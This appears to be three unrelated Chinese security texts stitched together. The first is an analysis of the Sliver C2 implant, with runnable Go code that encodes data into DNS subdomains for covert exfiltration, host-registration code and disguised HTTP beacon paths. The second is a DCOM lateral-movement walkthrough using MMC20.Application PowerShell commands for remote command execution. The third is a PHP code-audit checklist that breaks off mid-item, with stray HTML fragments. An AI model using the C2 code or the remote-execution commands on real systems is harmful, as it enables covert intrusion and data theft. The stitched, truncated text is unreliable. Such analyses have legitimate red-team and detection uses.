implant在初始化完成获得sessionID后,接着会启动两个GoRoutine(可以粗糙的理解为两个线程),一个 用于发送,一个用于接收,它们都是监控一个变量,当一个变量获得值之后立马进行相应的操作(发送/ 接收)。 如果是其他语言实现类似操作的话可能要实现一个内存安全的队列,而在Go里面可以用自带的语法实现 类似操作,既简单也明了。 关于implant实现http/https协议具体细节,画了一张脑图。 go func() {    defer connection.Cleanup()    for envelope := range send {        data, _ := proto.Marshal(envelope)        log.Printf("[http] send envelope ...")        go client.Send(data)   } }() HTTP/HTTPS server端一些有意思的点 伪时时回显 cobalt strike有sleep的概念,是implant每次回连server的时间,因为这个概念,每次执行命 令都会等待一段事件才能看到结果。 sliver的http/https协议上线没有sleep的概念,每次发送完命令它立马就能返回结果。 原理是server接收到implant的请求后,如果当前没有任务,会卡住implant的请求(最长一分 钟),直至有任务出现。implant在timeout后也会再次请求,所以看到的效果就是发送的命令 立马就能得到回显。 重放检测 防止蓝队对数据进行重放,implant的编码和加密多种多样,还有一定的随机值,理论上不可 能会有内容一样包再次发送,sliver server会将每次的数据sha1编码的方式记录下来,如果蓝 队对数据进行重放攻击,则会返回错误页面。 DNS dns协议虽然隐蔽,但它的限制较多,实现起来会有诸多束缚。 根据https://zh.wikipedia.org/wiki/%E5%9F%9F%E5%90%8D%E7%B3%BB%E7%BB%9F dns域名限制 为253字符 对每一级域名长度的限制是63个字符 一个DNS TXT 记录字符串最多可包含255 个字符 知道了以上限制就可以设计自己的DNS上线协议了。 sliver设计的协议是最终发送DNS的数据都会经过base32编码(会处理掉=),使用了自己的编码表 dnsCharSet = []rune("abcdefghijklmnopqrstuvwxyz0123456789_") sliver设计的域名发送格式为 subdata:表示发送的数据,最多3*63=189字节,subdata可能会有多个子域 seq:表示这是数据的第几个 nonce:一个10位字节的随机数,以防解析器忽略 TTL,以及后面防重放攻击的避免手段 sessionid: sessionid标记当前implant msgType:表示执行的命令类型 parentdomain: 自定义的域名 计算发送次数 size := int(math.Ceil(float64(len(encoded)) / float64(dnsSendDomainStep))) dnsSendDomainStep = 189 #每一级域名长度的限制是63个字符,sliver取3个子域用于发送数 据,最大可发送 63 * 3 = 189字节 但是最终数据都会经过Base 32 编码,所以 (n*8 + 4) /5 = 63,n=39,意味着每次请求最终可发送39*3 =117 个字节 subdata 、 seq 、 nonce 由发送函数自动生成组装,sessionid、msgType、parentdomain 由用户控 制。我将它DNS发送函数抽取了出来,可以自己模拟DNS发送的过程。 subdata.seq.nonce.sessionid.msgType.parentdomain package main import ( "bytes" "encoding/base32" "encoding/binary" "fmt" "log" "math" insecureRand "math/rand" "strings" ) const ( sessionIDSize = 16 dnsSendDomainSeg  = 63 dnsSendDomainStep = 189 // 63 * 3 domainKeyMsg  = "_domainkey" blockReqMsg   = "b" clearBlockMsg = "cb" sessionInitMsg     = "si" sessionPollingMsg  = "sp" sessionEnvelopeMsg = "se" nonceStdSize = 6 blockIDSize = 6 maxBlocksPerTXT = 200 // How many blocks to put into a TXT resp at a time ) var dnsCharSet = []rune("abcdefghijklmnopqrstuvwxyz0123456789_") var base32Alphabet = "ab1c2d3e4f5g6h7j8k9m0npqrtuvwxyz" var sliverBase32 = base32.NewEncoding(base32Alphabet) func dnsEncodeToString(input []byte) string { encoded := sliverBase32.EncodeToString(input) // {{if .Config.Debug}} log.Printf("[base32] %#v", encoded) // {{end}} return strings.TrimRight(encoded, "=") } // dnsNonce - Generate a nonce of a given size in case the resolver ignores the TTL func dnsNonce(size int) string { nonce := []rune{} for i := 0; i < size; i++ { index := insecureRand.Intn(len(dnsCharSet)) nonce = append(nonce, dnsCharSet[index]) } return string(nonce) } func dnsDomainSeq(seq int) []byte { buf := new(bytes.Buffer) binary.Write(buf, binary.LittleEndian, uint32(seq)) return buf.Bytes() } // Send raw bytes of an arbitrary length to the server func dnsSend(parentDomain string, msgType string, sessionID string, data []byte) { encoded := dnsEncodeToString(data) size := int(math.Ceil(float64(len(encoded)) / float64(dnsSendDomainStep))) // {{if .Config.Debug}} log.Printf("Encoded message length is: %d (size = %d)", len(encoded), size) // {{end}} nonce := dnsNonce(10) // Larger nonce for this use case // DNS domains are limited to 254 characters including '.' so that means // Base 32 encoding, so (n*8 + 4) / 5 = 63 means we can encode 39 bytes // So we have 63 * 3 = 189 (+ 3x '.') + metadata // So we can send up to (3 * 39) 117 bytes encoded as 3x 63 character subdomains // We have a 4 byte uint32 seqence number, max msg size (2**32) * 117 = 502511173632 // // Format: (subdata...).(seq).(nonce).(session id).(_)(msgType).<parent domain> //               [63].[63].[63].[4].[20].[12].[3]. //                   ... ~235 chars ... //               Max parent domain: ~20 chars // for index := 0; index < size; index++ { // {{if .Config.Debug}} log.Printf("Sending domain #%d of %d", index+1, size) // {{end}} start := index * dnsSendDomainStep stop := start + dnsSendDomainStep if len(encoded) <= stop { stop = len(encoded) } // {{if .Config.Debug}} log.Printf("Send data[%d:%d] %d bytes", start, stop, len(encoded[start:stop])) // {{end}} data := encoded[start:stop] // Total data we're about to send subdomains := int(math.Ceil(float64(len(data)) / dnsSendDomainSeg)) // {{if .Config.Debug}} log.Printf("Subdata subdomains: %d", subdomains) // {{end}} subdata := []string{} // Break up into at most 3 subdomains (189) for dataIndex := 0; dataIndex < subdomains; dataIndex++ { dataStart := dataIndex * dnsSendDomainSeg dataStop := dataStart + dnsSendDomainSeg if len(data) < dataStop { dataStop = len(data) } // {{if .Config.Debug}} log.Printf("Subdata #%d [%d:%d]: %#v", dataIndex, dataStart, dataStop, data[dataStart:dataStop]) // {{end}} subdata = append(subdata, data[dataStart:dataStop]) } // {{if .Config.Debug}} log.Printf("Encoded subdata: %#v", subdata) // {{end}} subdomain := strings.Join(subdata, ".") seq := dnsEncodeToString(dnsDomainSeq(index)) domain := subdomain + fmt.Sprintf(".%s.%s.%s.%s.%s", seq, nonce, sessionID, msgType, parentDomain) log.Println("dnsLookup", domain) //_, err := dnsLookup(domain) //if err != nil { // return "", err //} } // A domain with "_" before the msgType means we're doing sending data domain := fmt.Sprintf("%s.%s.%s.%s", nonce, sessionID, "_"+msgType, parentDomain) log.Println("dnsLookup and recv", domain) } func main() { parentDomain := "360.cn" msgType := "si" //sessionInitMsg sessionID := "_" var data = []byte("texttexttexttexttexttexttexttexttexttexttexttext") dnsSend(parentDomain, msgType, sessionID, data) } DNS C2上线协议部分总结了一下脑图 防止重放攻击 server会记录每次请求过来的连接,将它们sha1编码,每次请求都会检查一遍,如果有相同的DNS请求 第二次收到,表明可能是蓝队对木马或流量开始了分析。 DNS Canary发现 除了server端的重放检测,向implant内置一个诱饵dns,也是一个检查暴露的方法。如果有人访问这个 地址,说明implant已经暴露了。 dns canary域名生成 server\generate\canaries.go 会随机生成一个子域名,存储在数据库,存储的内容 server端启动dns服务后,会查看DNS的信息,如果是数据库中存在的canary dns,则会更新这个dns的 信息(更新触发时间,触发次数,是否第一次触发),然后向控制端广播。 最后向请求者返回一个随机IP。 编码协议 client 操作 teamserver,是通过grpc + mtls双向加密进行 具体协议的内容在源代码的 protobuf\README.md 因为使用了grpc,它使用的协议是Google的 proto3 。 Protocol Buffer (简称Protobuf) 是Google出品的性能优异、跨语言、跨平台的序列化库。 在 protobuf 目录下,一些协议的说明 查看client的协议源文件 clientpb ,就可以看到木马会发送哪些字段了 Protobuf ========== *`commonpb` -`clientpb` 和 `sliverpb` 之间共享的通用消息。值得注意的是通用的“Request”和 “Response”类型,它们在 gRPC 请求/响应中用作标头。 *`clientpb` -这些消息 只从客户端发送到服务器。 *`sliverpb` -这些消息可以从客户端发送到服务器或从服务器发送到植入物,反之亦然。并非此文件中定 义的所有消息都会出现在客户端<->服务器通信中,有些是特定于植入<->服务器的。 *`rpcpb` -gRPC 服务定义 syntax = "proto3"; package clientpb; option go_package = "github.com/bishopfox/sliver/protobuf/clientpb"; import "commonpb/common.proto"; // [ Version ] ---------------------------------------- message Version { int32 Major = 1; int32 Minor = 2; int32 Patch = 3; string Commit = 4; bool Dirty = 5; int64 CompiledAt = 6; string OS = 7; string Arch = 8; } // [ Core ] ---------------------------------------- message Session { uint32 ID = 1; string Name = 2; string Hostname = 3; string UUID = 4; string Username = 5; string UID = 6; string GID = 7; string OS = 8; string Arch = 9; string Transport = 10; string RemoteAddress = 11; int32 PID = 12; string Filename = 13; // Argv[0] string LastCheckin = 14; string ActiveC2 = 15; string Version = 16; bool Evasion = 17; bool IsDead = 18; uint32 ReconnectInterval = 19; string ProxyURL = 20; } message ImplantC2 { uint32 Priority = 1; string URL = 2; string Options = 3; // Protocol specific options } message ImplantConfig { string GOOS = 1; string GOARCH = 2; string Name = 3; string CACert = 4; string Cert = 5; string Key = 6; bool Debug = 7; bool Evasion = 31; bool ObfuscateSymbols = 30; uint32 ReconnectInterval = 8; uint32 MaxConnectionErrors = 9; // c2 repeated ImplantC2 C2 = 10; repeated string CanaryDomains = 11; bool LimitDomainJoined = 20; string LimitDatetime = 21; string LimitHostname = 22; string LimitUsername = 23; string LimitFileExists = 32; enum OutputFormat {   SHARED_LIB = 0;   SHELLCODE = 1;   EXECUTABLE = 2;   SERVICE = 3; } OutputFormat Format = 25; bool IsSharedLib = 26; string FileName = 27; bool IsService = 28; bool IsShellcode = 29; } // Configs of previously built implants message ImplantBuilds { map<string, ImplantConfig> Configs = 1; } message DeleteReq { string Name = 1; } // DNSCanary - Single canary and metadata message DNSCanary { string ImplantName = 1; string Domain = 2; bool Triggered = 3; string FirstTriggered = 4; string LatestTrigger = 5; uint32 Count = 6; } message Canaries { repeated DNSCanary Canaries = 1; } message ImplantProfile { string Name = 1; ImplantConfig Config = 2; } message ImplantProfiles { repeated ImplantProfile Profiles = 1; } message RegenerateReq { string ImplantName = 1; } message Job { uint32 ID = 1; string Name = 2; string Description = 3; string Protocol = 4; uint32 Port = 5; repeated string Domains = 6; } // [ Jobs ] ---------------------------------------- message Jobs { repeated Job Active = 1; } message KillJobReq { uint32 ID = 1; } message KillJob { uint32 ID = 1; bool Success = 2; } // [ Listeners ] ---------------------------------------- message MTLSListenerReq { string Host = 1; uint32 Port = 2; bool Persistent = 3; } message MTLSListener { uint32 JobID = 1; } message DNSListenerReq { repeated string Domains = 1; bool Canaries = 2; string Host = 3; uint32 Port = 4; bool Persistent = 5; } message DNSListener { uint32 JobID = 1; } message HTTPListenerReq { string Domain = 1; string Host = 2; uint32 Port = 3; bool Secure = 4; // Enable HTTPS string Website = 5; bytes Cert = 6; bytes Key = 7; bool ACME = 8; bool Persistent = 9; } // Named Pipes Messages for pivoting message NamedPipesReq { string PipeName = 16; commonpb.Request Request = 9; } message NamedPipes { bool Success = 1; string Err = 2; commonpb.Response Response = 9; } // TCP Messages for pivoting message TCPPivotReq { string Address = 16; commonpb.Request Request = 9; } message TCPPivot { bool Success = 1; string Err = 2; commonpb.Response Response = 9; } message HTTPListener { uint32 JobID = 1; } // [ commands ] ---------------------------------------- message Sessions { repeated Session Sessions = 1; } message UpdateSession { uint32 SessionID = 1; string Name = 2; } message GenerateReq { ImplantConfig Config = 1; } message Generate { commonpb.File File = 1; } message MSFReq { string Payload = 1; string LHost = 2; uint32 LPort = 3; string Encoder = 4; int32 Iterations = 5; commonpb.Request Request = 9; } message MSFRemoteReq { string Payload = 1; string LHost = 2; uint32 LPort = 3; string Encoder = 4; int32 Iterations = 5; uint32 PID = 8; commonpb.Request Request = 9; } enum StageProtocol {   TCP = 0;   HTTP = 1;   HTTPS = 2; } message StagerListenerReq { StageProtocol Protocol = 1; string Host = 2; uint32 Port = 3; bytes Data = 4; bytes Cert = 5; bytes Key = 6; bool ACME = 7; } message StagerListener { uint32 JobID = 1; } message ShellcodeRDIReq { bytes Data = 1; string FunctionName = 2; string Arguments = 3; } message ShellcodeRDI { bytes Data = 1; } message MsfStagerReq { string Arch = 1; string Format = 2; uint32 Port = 3; string Host = 4; string OS = 5; // reserved for future usage StageProtocol Protocol = 6; repeated string BadChars = 7; } message MsfStager { commonpb.File File = 1; } // GetSystemReq - Client request to the server which is translated into //               InvokeSystemReq when sending to the implant. message GetSystemReq { string HostingProcess = 1; ImplantConfig Config = 2; commonpb.Request Request = 9; } // MigrateReq - Client request to the server which is translated into //             InvokeMigrateReq when sending to the implant. message MigrateReq { uint32 Pid = 1; ImplantConfig Config = 2; commonpb.Request Request = 9; } // [ Tunnels ] ---------------------------------------- message CreateTunnelReq { commonpb.Request Request = 9; } message CreateTunnel { uint32 SessionID = 1; uint64 TunnelID = 8 [jstype = JS_STRING]; } message CloseTunnelReq { uint64 TunnelID = 8 [jstype = JS_STRING]; commonpb.Request Request = 9; } // [ events ] ---------------------------------------- message Client { uint32 ID = 1; string Name = 2; Operator Operator = 3; } message Event { string EventType = 1; Session Session = 2; Job Job = 3; Client Client = 4; bytes Data = 5; string Err = 6; // Can't trigger normal gRPC error } message Operators { repeated Operator Operators = 1; } message Operator { bool Online = 1; string Name = 2; } // [ websites ] ---------------------------------------- message WebContent { string Path = 1; string ContentType = 2; uint64 Size = 3 [jstype = JS_STRING]; bytes Content = 9; } message WebsiteAddContent { string Name = 1; map<string, WebContent> Contents = 2; } message WebsiteRemoveContent { string Name = 1; repeated string Paths = 2; } message Website { string Name = 1; map<string, WebContent> Contents = 2; } message Websites { repeated Website Websites = 1; } 可学习的go编程 有很多Go编程的细节可以学习。 处理自定义协议 implant主函数很精简,先通过自定义协议连接,再一个主函数处理连接后的操作。 连接部分精简化的代码就是这样 for { connection := transports.StartConnectionLoop() if connection == nil { break } mainLoop(connection) } nextCCServer可以通过连接的次数和server的数量变换协议和server func nextCCServer() *url.URL { uri, err := url.Parse(ccServers[*ccCounter%len(ccServers)]) *ccCounter++ if err != nil { return nextCCServer() } return uri } 后续通过解析出来的协议再分别处理。nextCCServer的算法有点简单,自己写的话可以修改一下,用一 些时间算法,dga算法等等,来达到随机化获取c2 teamserver的目的。 map映射函数 在接收任务进行处理的时候,通过map映射执行相关的函数 Goroutine 和 chanel 使用chanel传递参数,使用goroutine创建处理过程 chanel创建完成后,想像server发送指令,只需要 即可 获取基础信息 send <- 指令 func getRegisterSliver() *sliverpb.Envelope { hostname, err := os.Hostname() if err != nil { hostname = "" } currentUser, err := user.Current() if err != nil { // Gracefully error out currentUser = &user.User{ Username: "<< error >>", 得到信息后,直接通过发送到相关transport实现的send chan里 测试用例 用于工程化的一键生成、一键测试,详情可查看 _test.go 结尾的文件,这是个好习惯 流量特征 Uid:      "<< error >>", Gid:      "<< error >>", } } filename, err := os.Executable() // Should not happen, but still... if err != nil { //TODO: build the absolute path to os.Args[0] if 0 < len(os.Args) { filename = os.Args[0] } else { filename = "<< error >>" } } // Retrieve UUID uuid := hostuuid.GetUUID() data, err := proto.Marshal(&sliverpb.Register{ Name:              consts.SliverName, Hostname:          hostname, Uuid:              uuid, Username:          currentUser.Username, Uid:               currentUser.Uid, Gid:               currentUser.Gid, Os:                runtime.GOOS, Version:           version.GetVersion(), Arch:              runtime.GOARCH, Pid:               int32(os.Getpid()), Filename:          filename, ActiveC2:          transports.GetActiveC2(), ReconnectInterval: uint32(transports.GetReconnectInterval() / time.Second), ProxyURL:          transports.GetProxyURL(), }) if err != nil { return nil } return &sliverpb.Envelope{ Type: sliverpb.MsgRegister, Data: data, } } connection.Send <- getRegisterSliver() http 获取公钥,访问 .txt 结尾 获取sessionid 会返回jsp结尾的uri 回显数据发送,以php结尾的uri poll拉取请求,以访问 .js 结尾的uri 默认的UA以及请求流量 func (s *SliverHTTPClient) txtURL() string { curl, _ := url.Parse(s.Origin) segments := []string{"static", "www", "assets", "text", "docs", "sample"} filenames := []string{"robots.txt", "sample.txt", "info.txt", "example.txt"} curl.Path = s.pathJoinURL(s.randomPath(segments, filenames)) return curl.String() } func (s *SliverHTTPClient) jspURL() string { curl, _ := url.Parse(s.Origin) segments := []string{"app", "admin", "upload", "actions", "api"} filenames := []string{"login.jsp", "admin.jsp", "session.jsp", "action.jsp"} curl.Path = s.pathJoinURL(s.randomPath(segments, filenames)) return curl.String() } func (s *SliverHTTPClient) phpURL() string { curl, _ := url.Parse(s.Origin) segments := []string{"api", "rest", "drupal", "wordpress"} filenames := []string{"login.php", "signin.php", "api.php", "samples.php"} curl.Path = s.pathJoinURL(s.randomPath(segments, filenames)) return curl.String() } func (s *SliverHTTPClient) jsURL() string { curl, _ := url.Parse(s.Origin) segments := []string{"js", "static", "assets", "dist", "javascript"} filenames := []string{"underscore.min.js", "jquery.min.js", "bootstrap.min.js"} curl.Path = s.pathJoinURL(s.randomPath(segments, filenames)) return curl.String() } defaultUserAgent = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" req, _ := http.NewRequest(method, uri, body) req.Header.Set("User-Agent", defaultUserAgent) req.Header.Set("Accept-Language", "en-US") query := req.URL.Query() query.Set("_", fmt.Sprintf("%d", encoderNonce)) dns 对于一个域名有多个5级域名以上的DNS请求,或txt请求记录 一次完整的dns交互可能包含这些敏感DNS域名的字符串 _domainkey 、 .si 、 .se 、 .b
T1175: Lateral Movement via DCOM 查看mitre ATT&CK 的描述,已经不推荐使用该技术,推荐使用Remote Services: Distributed Component Object Model和Inter-Process Communication: Component Object Model。 参考: The Component Object Model LATERAL MOVEMENT USING EXCEL.APPLICATION AND DCOM 域渗透——利用DCOM在远程系统执行程序 组件对象模型 什么是DCOM( Distributed Component Object Model ,分布式组件模型),先说下COM (Component Object Model ,组件对象模型)。 COM component(COM组件)是微软公司为了计算机工业的软件生产更加符合人类的行为方式 开发的一种新的软件开发技术。——百科 The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. COM is the foundation technology for Microsoft's OLE (compound documents), ActiveX (Internet- enabled components), as well as others.——MSDN 简要的描述下COM: COM 不是一种面向对象的语言,而是一种标准,和编程语言或OS无关。 COM对语言的唯一要求:代码在能够创造指针结构的语言中生成,并且能够通过指针显式或隐式 的调用函数。 COM 主要的两个内容:对象和接口 每个对象和接口都关联一个128位的GUID(全局唯一标识符),称为类CLSID(类标识符),用于 标识唯一的COM对象。 COM 类在操作系统中注册的,位于注册表中: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID DCOM是什么? RPC+COM == DCOM ,DCOM允许COM组件利用网络来传输数据。 笔者这里只是简单里描述关键概念,Microsoft 为了实现跨机器、跨语言、跨平台、跨进程, COM的内容非常之复杂。 对DCOM有了一个了解,下面的测试过程可以概括为:利用DCOM 远程调用COM组件执行命令 Execution MMC20.Application COM class 存储在注册表中: 和目标建立连接: 通过DCOM对象在受害者系统上执行命令: 仅演示,既然能执行cmd,就能执行其他命令,反弹shell,存活探测等等。 不要局限演示,例如在Cobalt Strike beacon 中执行命令等等。 Get-ChildItem 'registry::HKEY_CLASSES_ROOT\WOW6432Node\CLSID\{49B2791A-B1AE- 4C90-9B8E-E860BA07F889}' $a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application. 1","")) $a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c hostname > c:\Hostname.txt","7") Observations 先看下整个执行命令过程发生的日志: 使用ProcessMonitor 查看下进程详情: mmc.exe 的父进程是 svchost.exe ,在TCP/IP 菜单中可以查看到 PC-jerry-0day 向 OWA2010SP3 建立的 连接。 使用ProcessMonitor 查看 "mmc.exe"启动过程中的调用 stack(堆栈),调用了 rpcrt4.dll : 小结 使用DCOM横向的方法还有很多,文章的原作者写了几篇关于DCOM 横向的,有机会在学习吧,可能 我们用的最多的是 impacket 中的dcomexec ,原理上有所不同,具体哪里不同,笔者也说不上来(如果 有知道的师傅请指教),唯一注意的点,需要管理权限。 参考 View::ExecuteShellCommand method LATERAL MOVEMENT USING THE MMC20.APPLICATION COM OBJECT GetTypeFromCLSID(Guid, String) COM Technical Overview 还有一部分资料没来得及阅读,这里补充: 如何滥用DCOM实现横向渗透 红蓝对抗攻防实战:寻找COM对象 Abusing the COM Registry Structure: CLSID, LocalServer32, & InprocServer32 Abusing DCOM For Yet Another Lateral Movement Technique NEW LATERAL MOVEMENT TECHNIQUES ABUSE DCOM TECHNOLOGY
作者:http://www.sectop.com/ 文档制作:http://www.mythhack.com PHP 代码审计 目录 1. 概述 ...................................................................... 2 2. 输入验证和输出显示 ......................................................... 2 1. 命令注入 ............................................................ 3 2. 跨站脚本 ............................................................ 3 3. 文件包含 ............................................................ 4 4. 代码注入 ............................................................ 4 5. SQL注入 ............................................................. 4 6. XPath 注入 ........................................................... 4 7. HTTP响应拆分 ........................................................ 5 8. 文件管理 ............................................................ 5 9. 文件上传 ............................................................ 5 10. 变量覆盖 ............................................................ 5 11. 动态函数 ............................................................ 6 3. 会话安全 .................................................................. 6 1. HTTPOnly设置 ........................................................ 6 2. domain 设置 .......................................................... 6 3. path设置 ............................................................ 6 4. cookies持续时间 ...................................................... 6 5. secure 设置 .......................................................... 6 6. session固定 ......................................................... 7 7. CSRF ................................................................ 7 4. 加密 ...................................................................... 7 1. 明文存储密码 ......................................................... 7 2. 密码弱加密........................................................... 7 3. 密码存储在攻击者能访问到的文件 ......................................... 7 5. 认证和授权................................................................. 7 1. 用户认证 ............................................................ 7 1. 函数或文件的未认证调用 ................................................ 7 3. 密码硬编码........................................................... 8 6. 随机函数 .................................................................. 8 1. rand() .............................................................. 8 2. mt_srand()和mt_rand() ................................................ 8 7. 特殊字符和多字节编码 ........................................................ 8 1. 多字节编码........................................................... 8 8. PHP危险函数 ............................................................... 8 1. 缓冲区溢出........................................................... 8 2. session_destroy()删除文件漏洞 .......................................... 9 3. unset()-zend_hash_del_key_or_index漏洞 ................................. 9 9. 信息泄露 ................................................................. 10 作者:http://www.sectop.com/ 文档制作:http://www.mythhack.com 1. phpinfo ............................................................ 10 10. PHP环境 ................................................................ 10 1. open_basedir设置 .................................................... 10 2. allow_url_fopen 设置 ................................................. 10 3. >allow_url_include 设置 ............................................ 10 4. safe_mode_exec_dir设置 .............................................. 10 5. magic_quote_gpc 设置 ................................................. 10 6. register_globals 设置 ................................................ 11 7. safe_mode设置 ...................................................... 11 8. session_use_trans_sid 设置 ............................................ 11 9. display_errors设置 .................................................. 11 10. expose_php 设置...................................................... 11 1. 概述 代码审核,是对应用程序源代码进行系统性检查的工作。它的目的是为了找到并且修复应 用程序在开发阶段存在的一些漏洞或者程序逻辑错误,避免程序漏洞被非法利用给企业带来不必 要的风险。 代码审核不是简单的检查代码,审核代码的原因是确保代码能安全的做到对信息和资源进 行足够的保护,所以熟悉整个应用程序的业务流程对于控制潜在的风险是非常重要的。审核人员 可以使用类似下面的问题对开发者进行访谈,来收集应用程序信息。  应用程序中包含什么类型的敏感信息,应用程序怎么保护这些信息的?  应用程序是对内提供服务,还是对外?哪些人会使用,他们都是可信用户么?  应用程序部署在哪里?  应用程序对于企业的重要性? 最好的方式是做一个 checklist,让开发人员填写。Checklist 能比较直观的反映应用程序 的信息和开发人员所做的编码安全,它应该涵盖可能存在严重漏洞的模块,例如:数据验证、身 份认证、会话管理、授权、加密、错误处理、日志、安全配置、网络架构。 2. 输入验证和输出显示 大多数漏洞的形成原因主要都是未对输入数据进行安全验证或对输出数据未经过安全处理, 比较严格的数据验证方式为: 1. 对数据进行精确匹配 2. 接受白名单的数据 3. 拒绝黑名单的数据 作者:http://www.sectop.com/ 文档制作:http://www.mythhack.com 4. 对匹配黑名单的数据进行编码 在 PHP 中可由用户输入的变量列表如下:  $_SERVER  $_GET  $_POST  $_COOKIE  $_REQUEST  $_FILES  $_ENV  $_HTTP_COOKIE_VARS  $_HTTP_ENV_VARS  $_HTTP_GET_VARS  $_HTTP_POST_FILES  $_HTTP_POST_VARS  $_HTTP_SERVER_VARS 我们应该对这些输入变量进行检查 1. 命令注入 PHP 执行系统命令可以使用以下几个函数:system、exec、passthru、“、shell_exec、 popen、proc_open、pcntl_exec 我们通过在全部程序文件中搜索这些函数,确定函数的参数是否会因为外部提交而改变, 检查这些参数是否有经过安全处理。 防范方法: 1. 使用自定义函数或函数库来替代外部命令的功能 2. 使用 escapeshellarg 函数来处理命令参数 3. 使用 safe_mode_exec_dir 指定可执行文件的路径 2. 跨站脚本 反射型跨站常常出现在用户提交的变量接受以后经过处理,直接输出显示给客户端;存储 型跨站常常出现在用户提交的变量接受过经过处理后,存储在数据库里,然后又从数据库中读取 到此信息输出到客户端。输出函数经常使用:echo、print、printf、vprintf、<%=$test%> 对于反射型跨站,因为是立即输出显示给客户端,所以应该在当前的 php 页面检查变量被 客户提交之后有无立即显示,在这个过程中变量是否有经过安全检查。 对于存储型跨站,检查变量在输入后入库,又输出显示的这个过程中,变量是否有经过安 全检查。 防范方法: 1. 如果输入数据只包含字母和数字,那么任何特殊字符都应当阻止 2. 对输入的数据经行严格匹配,比如邮件格式,用户名只包含英文或者中文、下划线、连字符 3. 对输出进行 HTML 编码,编码规范 < &lt; > &gt; 作者:http://www.sectop.com/ 文档制作:http://www.mythhack.com ( &#40; ) &#41; # &#35; & &amp; " &quot; ‘ &apos; ` %60 3. 文件包含 PHP 可能出现文件包含的函数:include、include_once、require、require_once、 show_source、highlight_file、readfile、file_get_contents、fopen、 nt>file 防范方法: 1. 对输入数据进行精确匹配,比如根据变量的值确定语言 en.php、cn.php,那么这两个文件放在 同一个目录下’language/’.$_POST[‘lang’].’.php’,那么检查提交的数据是否是 en 或者 cn 是最严格的,检查是否只包含字母也不错 2. 通过过滤参数中的/、..等字符 4. 代码注入 PHP 可能出现代码注入的函数:eval、preg_replace+/e、assert、call_user_func、 call_user_func_array、create_function 查找程序中程序中使用这些函数的地方,检查提交变量是否用户可控,有无做输入验证 防范方法: 1. 输入数据精确匹配 2. 白名单方式过滤可执行的函数 5. SQL 注入 SQL 注入因为要操作数据库,所以一般会查找 SQL 语句关键字:insert、delete、update、 select,查看传递的变量参数是否用户可控制,有无做过安全处理 防范方法: 使用参数化查询 6. XPath 注入 Xpath 用于操作 xml,我们通过搜索 xpath 来分析,提交给<fo nt face="Arial, sans-serif">xpath</fo 函数的参数是否有经过安全处理 防范方法: 对于数据进行精确匹配 作者:http://www.sectop.com/ 文档制作:http://www.mythhack.com 7. HTTP 响应拆分 PHP 中可导致 HTTP 响应拆分的情况为:使用 header 函数和使用$_SERVER 变量。注意 PHP 的高版本会禁止 HTTP 表头中出现换行字符,这类可以直接跳过本测试。 防范方法: 1. 精确匹配输入数据 2. 检测输入输入中如果有\r 或\n,直接拒绝 8. 文件管理 PHP 的用于文件管理的函数,如果输入变量可由用户提交,程序中也没有做数据验证,可 能成为高危漏洞。我们应该在程序中搜索如下函数:copy、rmdir、unlink、delete、fwrite、 chmod、fgetc、fgetcsv、fgets、fgetss、file、file_get_contents、fread、readfile、ftruncate、 file_put_contents、fputcsv、fputs,但通常 PHP 中每一个文件操作函数都可能是危险的。 http://ir.php.net/manual/en/re f.filesystem.php 防范方法: 1. 对提交数据进行严格匹配 2. 限定文件可操作的目录 9. 文件上传 PHP 文件上传通常会使用 move_uploaded_file,也可以找到文件上传的程序进行具体分析 防范方式: 1. 使用白名单方式检测文件后缀 2. 上传之后按时间能算法生成文件名称 3. 上传目录脚本文件不可执行 4. 注意%00 截断 10. 变量覆盖 PHP 变量覆盖会出现在下面几种情况: 1. 遍历初始化变量 例: foreach($_GET as $key => $value) $$key = $value; 2. 函数覆盖变量:parse_str、mb_parse_str、import_request_variables 3. Register_globals=ON 时,GET 方式提交变量会直接覆盖 防范方法: 1. 设置 Register_globals=OFF 2. 不要使用这些函数来获取变量 作者:http://www.sectop.com/ 文档制作:http://www.mythhack.com 11. 动态函数 当使用动态函数时,如果用户对变量可控,则可导致攻击者执行任意函数。 例: <?php $myfunc = $_GET['myfunc' font>]; $myfunc(); ?> 防御方法: 不要这样使用函数 3. 会话安全 1. HTTPOnly 设置 session.cookie_httponly = ON 时,客户端脚本(JavaScript 等)无法访问该 cookie,打 开该指令可以有效预防通过 XSS 攻击劫持会话 ID 2. domain 设置 检查 session.cookie_domain 是否只包含本域,如果是父域,则其他子域能够获取本域的 cookies 3. path 设置 检查 session.cookie_path,如果网站本身应用在/app,则 path 必须设置为/app/,才能 保证安全 4. cookies 持续时间 检查 session.cookie_lifetime,如果时间设置过程过长,即使用户关闭浏览器,攻击者 也会危害到帐户安全 5. secure 设置 如果使用 HTTPS,那么应该设置 session.cookie_secure=ON,确保使用 HTTPS 来传输 cookies 作者:http://www.sectop.com/ 文档制作:http://www.mythhack.com 6. session 固定 如果当权限级别改变时(例如核实用户名和密码后,普通用户提升到管理员),我们就应 该修改即将重新生成的会话 ID,否则程序会面临会话固定攻击的风险。 7. CSRF 跨站请求伪造攻击,是攻击者伪造一个恶意请求链接,通过各种方式让正常用户访问后, 会以用户的身份执行这些恶意的请求。我们应该对比较重要的程序模块,比如修改用户密码,添 加用户的功能进行审查,检查有无使用一次性令牌防御 csrf 攻击。 4. 加密 1. 明文存储密码 采用明文的形式存储密码会严重威胁到用户、应用程序、系统安全。 2. 密码弱加密 使用容易破解的加密算法,MD5 加密已经部分可以利用 md5 破解网站来破解 3. 密码存储在攻击者能访问到的文件 例如:保存密码在 txt、ini、conf、inc、xml 等文件中,或者直接写在 HTML 注释中 5. 认证和授权 1. 用户认证  检查代码进行用户认证的位置,是否能够绕过认证,例如:登录代码可能存在表单注入。  检查登录代码有无使用验证码等,防止暴力破解的手段 1. 函数或文件的未认证调用 作者:http://www.sectop.com/ 文档制作:http://www.mythhack.com  一些管理页面是禁止普通用户访问的,有时开发者会忘记对这些文件进行权限验证,导致漏洞发 生  某些页面使用参数调用功能,没有经过权限验证,比如 index.php?action=upload 3. 密码硬编码 有的程序会把数据库链接账号和密码,直接写到数据库链接函数中。 6. 随机函数 1. rand() rand()最大随机数是 32767,当使用 rand 处理 session 时,攻击者很容易破解出 session, 建议使用 mt_rand() 2. mt_srand()和mt_rand() e="text-indent: 